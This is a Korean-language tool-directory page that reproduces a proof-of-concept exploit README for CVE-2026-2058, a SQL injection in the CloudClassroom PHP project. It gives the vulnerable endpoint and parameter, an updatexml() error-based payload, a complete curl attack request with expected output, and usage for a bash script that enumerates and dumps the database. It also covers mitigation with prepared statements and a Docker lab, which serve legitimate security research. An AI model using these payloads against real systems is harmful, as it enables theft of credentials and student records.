Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-2058-PoC — CVE-2026-2058에 대한 개념 증명 익스플로잇으로, CloudClassroom PHP 프로젝트의 SQL 인젝션 취약점을 이용하며, 자동화된 데이터베이스 열거 및 데이터 추출 기능을 포함합니다. | Kitploit
도구/GitHubGitHub/carlosalbertotuma/cve-2026-2058-poc
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubcarlosalbertotuma/cve-2026-2058-poc

CVE-2026-2058-PoC

CVE-2026-2058에 대한 개념 증명 익스플로잇으로, CloudClassroom PHP 프로젝트의 SQL 인젝션 취약점을 이용하며, 자동화된 데이터베이스 열거 및 데이터 추출 기능을 포함합니다.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
156개월 전아직 검토되지 않음
공유

CVE-2026-2058-PoC – CloudClassroom PHP 프로젝트 SQL 인젝션

개요

*CloudClassroom PHP 프로젝트(v1.0)*의 게시물 조회(Post Query) 기능에 SQL 인젝션 취약점이 존재합니다.

이 취약점으로 인해 공격자는 squeryx POST 파라미터를 통해 임의의 SQL 명령을 주입할 수 있으며, 이로 인해 데이터베이스 열거 및 데이터 추출이 가능합니다.

이 저장소에는 백엔드 데이터베이스에서 민감한 데이터를 추출하기 위해 취약점을 악용하는 방법을 보여주는 개념 증명(PoC) 익스플로잇이 포함되어 있습니다.


취약점 정보

필드값
CVECVE-2026-2058
취약점 유형SQL 인젝션
CWECWE-89
영향받는 소프트웨어CloudClassroom PHP 프로젝트
영향받는 버전1.0
구성 요소게시물 조회(Post Query) 기능
공격 경로원격(Remote)
인증 필요 여부아니요
영향데이터베이스 정보 노출
심각도높음(High)
공격 패턴 참조CAPEC-66

취약한 엔드포인트

POST /postquerypublic

취약한 파라미터

squeryx

근본 원인

백엔드 코드는 적절한 검증이나 파라미터화된 쿼리 없이 사용자 입력을 SQL 쿼리에 직접 연결합니다.

취약한 코드 예시:

$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";

$tempsquery가 사용자 입력에서 파생되므로 공격자는 임의의 SQL을 주입할 수 있습니다.


취약한 실습 환경 (Docker)

테스트 및 연구 목적으로 취약한 Docker 환경이 제공됩니다.

취약한 애플리케이션 실행

docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0

개념 증명(PoC)

이 취약점은 MySQL의 updatexml() 함수를 활용한 오류 기반 SQL 인젝션 기법으로 트리거할 수 있습니다.

페이로드 예시:

a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1

수동 익스플로잇

curl 요청 예시:

curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "[email protected]" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"

예상 응답:

XPATH syntax error: '~cc_db~'

익스플로잇 스크립트

이 저장소에는 다음 작업을 자동으로 수행하는 bash 익스플로잇이 포함되어 있습니다:

  • 데이터베이스 이름 추출
  • 테이블 열거
  • 컬럼 열거
  • 테이블 데이터 덤프

사용법

chmod +x cloudclassroom_sqli_exploit.sh

./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic

예시:

./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic

영향

공격자는 다음을 수행할 수 있습니다:

  • 데이터베이스 구조 열거
  • 민감한 데이터 추출
  • 관리자 자격 증명 탈취
  • 학생 기록 접근
  • 백엔드 데이터베이스 완전 장악

CVSS 점수

NIST NVD

  • 기본 점수: 9.8 (CRITICAL)
  • 벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CNA (VulDB)

  • 기본 점수: 7.3 (HIGH)
  • 벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

⚠️ 참고: NVD CVSS 점수는 영향 평가 방식의 차이로 인해 CNA(VulDB) 점수와 다릅니다.


EPSS (익스플로잇 예측 점수 시스템)

익스플로잇 예측 점수 시스템(EPSS)은 취약점이 실제 환경에서 악용될 확률을 추정합니다.

CVEEPSS 확률백분위날짜
CVE-2026-20580.000287.62 %2026-03-01

출처: FIRST EPSS 데이터셋


완화 방안

개발자는 다음을 수행해야 합니다:

  • 준비된 문(prepared statements) 사용
  • 입력 검증 구현
  • 사용자 입력을 적절히 이스케이프 처리
  • 최소 권한 데이터베이스 권한 적용

안전한 구현 예시:

$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();

스크린샷

SQL 인젝션 익스플로잇

image
image

참고 자료

  • https://cwe.mitre.org/data/definitions/89.html
  • https://owasp.org/Top10/2025/A05_2025-Injection/
  • https://capec.mitre.org/data/definitions/66.html
  • https://github.com/OWASP/www-project-web-security-testing-guide/blob/master/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md

면책 조항

이 익스플로잇은 교육 및 연구 목적으로만 제공됩니다.

저자는 이 코드로 인한 오용이나 피해에 대해 책임을 지지 않습니다.


작성자

bl4dsc4n

보안 연구원

도구 다운로드